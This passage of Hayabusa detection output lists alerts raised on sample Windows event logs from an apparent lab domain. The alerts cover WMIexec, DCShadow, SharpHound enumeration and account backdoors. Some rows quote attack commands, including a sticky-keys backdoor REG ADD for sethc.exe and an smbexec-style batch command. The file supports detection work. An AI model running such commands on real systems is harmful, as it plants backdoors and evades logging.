(GLOBAL).evtx" +2021-04-26 17:25:38.452 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 
0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.456 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.458 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.462 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.463 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share 
File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 127.0.0.1 | LID: 0x4da32af,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.464 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.479 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:38.481 +09:00,srvdefender01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: __1619425227.894209 | IP Addr: 10.23.123.11 | LID: 0x4da321f,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:26:03.004 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0xc8c | User: SRVDEFENDER01$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.330 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, 
Kerberos only).evtx" +2021-04-26 18:07:00.331 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:07:00.332 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, Kerberos only).evtx" +2021-04-26 18:08:00.382 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User 
Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.383 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:08:00.384 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742,5136-Enable Trust this computer for delegation (to specified service, any protocol).evtx" +2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1183,technique_name=Image File Execution Options Injection | CreateKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe | Process: C:\Windows\system32\reg.exe | PID: 4932 | PGUID: 5D63072B-84DE-6086-7B49-000000000C00",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.119 
+09:00,srvdefender01.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1183,technique_name=Image File Execution Options Injection | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger: C:\windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 4932 | PGUID: 5D63072B-84DE-6086-7B49-000000000C00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,critical,PrivEsc | Persis,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx" +2021-04-26 18:17:14.111 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: REG ADD ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"" /t REG_SZ /v Debugger /d ""C:\windows\system32\cmd.exe"" /f | Path: C:\Windows\System32\reg.exe | PID: 0x1b30 | User: admmig | LID: 0x2b5f6bf",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 18:17:37.439 
+09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\windows\system32\cmd.exe sethc.exe 211 | Path: C:\Windows\System32\cmd.exe | PID: 0x14bc | User: SRVDEFENDER01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 18:18:03.014 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1464 | User: SRVDEFENDER01$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4688-Stickey command reg update + execution.evtx +2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx +2021-04-26 23:16:45.757 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\seth2c.exe | Process: C:\Windows\system32\cmd.exe | PID: 1960 | PGUID: 7CF65FC7-C199-6086-520A-000000002000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx +2021-04-26 23:16:47.267 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\System32\sethc.exe | Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3328 | PGUID: 7CF65FC7-CAF6-6086-930A-000000002000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID11-New sethc file created from CMD copy.evtx +2021-04-27 00:03:05.976 +09:00,fs02.offsec.lan,11,info,,File Created,Path: C:\Windows\Temp\execute.bat | Process: C:\Windows\system32\cmd.exe | PID: 3492 | PGUID: 7CF65FC7-D629-6086-B70A-000000002000,rules/hayabusa/sysmon/events/11_FileCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID11,13-SMBexec service registration.evtx" +2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\cmd.exe /Q /c echo cd ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat | LID: 0x3e7 | PID: 3068 | PGUID: 7CF65FC7-D629-6086-B80A-000000002000 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process execution.evtx +2021-04-27 00:16:03.001 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs"" | Path: C:\Windows\System32\cscript.exe | PID: 0x1548 | User: SRVDEFENDER01$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x5429550,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x542957e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 00:16:04.047 +09:00,srvdefender01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\mmc.exe -Embedding | Path: C:\Windows\System32\mmc.exe | PID: 0xda4 | User: SRVDEFENDER01$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | 
Computer: - | IP Addr: 10.23.123.11 | LID: 0x542a072,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx" +2021-04-27 20:04:03.495 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 20:04:03.502 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 20:04:13.291 +09:00,rootdc1.offsec.lan,5136,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,CredAccess,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx" +2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2383c301,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP 
Addr: 10.23.23.9 | LID: 0x20ee2c3d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2383c901,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x20ee3135,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x2847721c,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x74005fb3,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,info,Collect,Network Share 
Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0xb108529d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x1f6f93ef,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x26fd49db,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x204a9a12,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x28477800,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:49.695 
+09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x62cbf9f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x369f8ca7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x740075dc,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:05.147 +09:00,exchange01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0xb1086cfb,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x1f6f9930,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share 
Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x26fd4ec6,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x204aa3a4,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: null | IP Addr: 10.23.23.9 | LID: 0x62cf99e,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx +2021-04-28 00:00:10.730 